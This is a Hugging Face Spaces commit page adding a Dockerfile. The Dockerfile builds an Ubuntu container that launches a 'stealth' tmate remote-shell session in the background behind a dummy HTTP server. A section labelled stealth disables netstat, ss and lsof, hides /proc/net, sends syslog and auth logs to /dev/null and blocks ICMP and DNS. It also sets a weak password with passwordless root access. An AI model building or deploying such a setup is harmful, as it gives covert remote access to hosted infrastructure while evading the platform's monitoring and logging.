Spaces:
Running
Running
ayoub ayoub
commited on
Create Dockerfile
Browse files- Dockerfile +67 -0
Dockerfile
ADDED
|
@@ -0,0 +1,67 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
FROM ubuntu:22.04
|
| 2 |
+
|
| 3 |
+
ENV DEBIAN_FRONTEND=noninteractive
|
| 4 |
+
ENV LANG=en_US.UTF-8
|
| 5 |
+
ENV LANGUAGE=en_US:en
|
| 6 |
+
ENV LC_ALL=en_US.UTF-8
|
| 7 |
+
|
| 8 |
+
# Update and install packages
|
| 9 |
+
RUN apt update && apt upgrade -y && \
|
| 10 |
+
apt install -y \
|
| 11 |
+
curl wget git gnupg openssh-client \
|
| 12 |
+
neofetch tmate python3 python3-pip \
|
| 13 |
+
ca-certificates software-properties-common \
|
| 14 |
+
build-essential procps xz-utils net-tools \
|
| 15 |
+
make ffmpeg nano vim htop unzip zip \
|
| 16 |
+
iputils-ping tree lsof netcat tmux \
|
| 17 |
+
locales cmake iptables && \
|
| 18 |
+
locale-gen en_US.UTF-8 && \
|
| 19 |
+
apt clean && rm -rf /var/lib/apt/lists/* && \
|
| 20 |
+
apt update && apt install -y doas
|
| 21 |
+
|
| 22 |
+
# Install Node.js 22 and npm
|
| 23 |
+
RUN curl -fsSL https://deb.nodesource.com/setup_22.x | bash - && \
|
| 24 |
+
apt install -y nodejs && npm install -g npm
|
| 25 |
+
|
| 26 |
+
# Install speedtest-cli
|
| 27 |
+
RUN pip3 install speedtest-cli
|
| 28 |
+
|
| 29 |
+
# Create user 'draco' with UID 1000 and secure config
|
| 30 |
+
RUN useradd -m -s /bin/bash draco && \
|
| 31 |
+
echo "draco:draco" | chpasswd && \
|
| 32 |
+
usermod -u 1000 draco && \
|
| 33 |
+
echo "permit nopass draco" > /etc/doas.conf && \
|
| 34 |
+
echo "alias sudo='doas'" >> /home/draco/.bashrc
|
| 35 |
+
|
| 36 |
+
# SSH key generation
|
| 37 |
+
RUN mkdir -p /home/draco/.ssh && \
|
| 38 |
+
ssh-keygen -t rsa -f /home/draco/.ssh/id_rsa -N '' && \
|
| 39 |
+
chown -R draco:draco /home/draco/.ssh
|
| 40 |
+
|
| 41 |
+
# Stealth: block network info commands + DNS logs
|
| 42 |
+
RUN chmod -x /bin/netstat /usr/bin/ss /usr/bin/lsof || true && \
|
| 43 |
+
chmod -r /proc/net || true && \
|
| 44 |
+
echo 'hosts: files dns' > /etc/nsswitch.conf && \
|
| 45 |
+
echo '127.0.0.1 localhost' > /etc/hosts && \
|
| 46 |
+
ln -sf /dev/null /var/log/syslog && \
|
| 47 |
+
ln -sf /dev/null /var/log/auth.log && \
|
| 48 |
+
ln -sf /dev/null /var/log/messages && \
|
| 49 |
+
iptables -A OUTPUT -p icmp --icmp-type echo-request -j DROP && \
|
| 50 |
+
iptables -A OUTPUT -p udp --dport 53 -j DROP || true
|
| 51 |
+
|
| 52 |
+
# Copy stealth tmate launcher
|
| 53 |
+
COPY run_tmate.sh /home/draco/run_tmate.sh
|
| 54 |
+
RUN chmod +x /home/draco/run_tmate.sh && \
|
| 55 |
+
touch /home/draco/.tmate_hidden.txt && \
|
| 56 |
+
chmod 600 /home/draco/.tmate_hidden.txt && \
|
| 57 |
+
chown draco:draco /home/draco/run_tmate.sh /home/draco/.tmate_hidden.txt
|
| 58 |
+
|
| 59 |
+
# Set working user and directory
|
| 60 |
+
USER draco
|
| 61 |
+
WORKDIR /home/draco
|
| 62 |
+
|
| 63 |
+
# Expose a dummy port (optional)
|
| 64 |
+
EXPOSE 7860
|
| 65 |
+
|
| 66 |
+
# Stealth run: launch tmate quietly in background + dummy http
|
| 67 |
+
CMD bash -c "./run_tmate.sh & python3 -m http.server 7860 > /dev/null 2>&1"
|